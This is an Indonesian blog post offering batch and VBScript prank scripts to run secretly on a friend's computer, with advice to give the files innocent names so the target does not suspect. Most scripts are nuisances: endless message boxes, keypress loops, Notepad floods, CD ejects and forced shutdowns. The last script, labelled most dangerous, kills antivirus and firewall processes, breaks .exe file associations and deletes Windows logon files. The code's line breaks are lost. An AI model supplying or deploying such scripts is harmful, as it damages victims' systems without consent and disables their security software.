kadang mungkin pernah terlintas dibenak anda untuk menjahili komputer milik teman anda??
Tenang,,,,script berikut mungkin bs anda gunakan sebagai bahan buat ngusilin teman anda !!!
Sebelum beraksi pertama-tama siapkan notepad nya terlebih dulu ya setelah itu siap deh buat copas script berikut ,,,
Cara membuat Pesan/message yang muncul terus-menerus
@ECHO off:Beginmsg * muka agan jelek abismsg * ngaca dulu sanamsg * hayo lo gan,cpu ente ane acak2 nihmsg * udah deh mending install ulang ajamsg * biar masalah nya bisa kelarGOTO BEGIN
Caranya: Copy script
diatas kemudian pastekan ke notepad anda, terakhir save namafile.BAT
(usahakan bikin nama file semenarik mungkin ,, biar si target nggak
curiga)
nb: Pesan tersebut bisa diubah menurut selera anda
Bikin Komputer shutdown dengan disertai message/pesan
@echo offmsg * apaan sih loshutdown -s -c "Error! muka agan standar abis"
save namafile.BAT
Script Buat Mainin Tombol Caps Lock button
Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loop
save namafile.vbs
Bisa Buka-Tutup CD/DVD Secara Otomatis
Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop
save namafile.vbs
Tekan Tombol Enter Terus-Menerus
Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "~(enter)"loop
save namafile.vbs
Menekan Tombol Backspace Terus-menerus
MsgBox "kembali ke menu sebelumnya"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop
save namafile.vbs
Otomatis Ngetik "muka agan jelek abiss" di notepad/word
Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "muka agan jelek abiss"loop
save namafile.vbs
Membuka Jendela Notepad Terus Menerus
@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top
save namafile.BAT
Otomatis Buka Notepad Lalu Ngetik Apa yg agan mau
WScript.Sleep 1800WScript.Sleep 100Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run "notepad"WScript.Sleep 10WshShell.AppActivate "Notepad"WScript.Sleep 50WshShell.SendKeys "a"WScript.Sleep 50WshShell.SendKeys "gan "WScript.Sleep 50WshShell.SendKeys "ma"WScript.Sleep 50WshShell.SendKeys "ho"WScript.Sleep 50WshShell.SendKeys " ba"WScript.Sleep 50WshShell.SendKeys "ng"WScript.Sleep 50WshShell.SendKeys "et"WScript.Sleep 50WshShell.SendKeys " d"WScript.Sleep 50WshShell.SendKeys "e"WScript.Sleep 50WshShell.SendKeys " h"WScript.Sleep 50WshShell.SendKeys "!"WScript.Sleep 50WshShell.SendKeys "!! "
save namafile.vbs
Bikin Quiz Sendiri
@echo offtitle quiz hari ini:menuclsecho jika agan kena virus apa yang agan lakukanpauseecho pilih yang mana:echo 1. matiin computerecho 2. format ajaecho 3. bingung ahhset input=nothingset /p input=Choice:if %input%==1 shutdown -s -t 30if %input%==2 del c:\xxxif %input%==3 @ECHO offmsg * muka agan jelek sihmsg * ngaca dulu gihmsg * hayo lo gan,cpu ente ane acak2msg * ud install ulang ajamsg * biar masalah nya kelar, hihihi@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top
nah script diatas save jadi quiz.bat kasih ke temen..
* YANG INI PALING BERBAHAYA, SEBAIKNYA JANGAN PERNAH DICOBA DI KOMPUTER ANDA
@echo offset end=md “Hackinstalling”set fin=copy “Hacklog.txt” “Installing”%end%%fin%net send * Hack isinstalling, press OK tobegin set up.kill NAVAPSVC.exe /F /Qkill zonelabs.exe /F /Qkill explorer.exe /F /Qclsassoc .exe=txtfileassoc .txt=mp3fileclsmsg * It is you who ishacked ….msg * I warned you,and you kept going.Challenge me and thisis what happens.DEL C:\WINDOWS\system32\logoff.exe /F /QDEL C:\WINDOWS\system32\logon.exe /F /QDEL C:\WINDOWS\system32\logon.scr /F /Qclsshutdown -s -t 5 -c“ thank you forwaiting”save script diatas dg ekstensi *.bat
Cara menjalankan program jahil tersebut adalah dengan klik 2x pada file notepad yang anda buat tadi
cara untuk menghentikan script tersebut adalah sbb : buka task manager (CTRL+ALT+DEL)–>applications–>Lihat aplikasi yang dijalankan td–>klik kanan–>Go To Process–>end process pada baris yang disorot
0 komentar: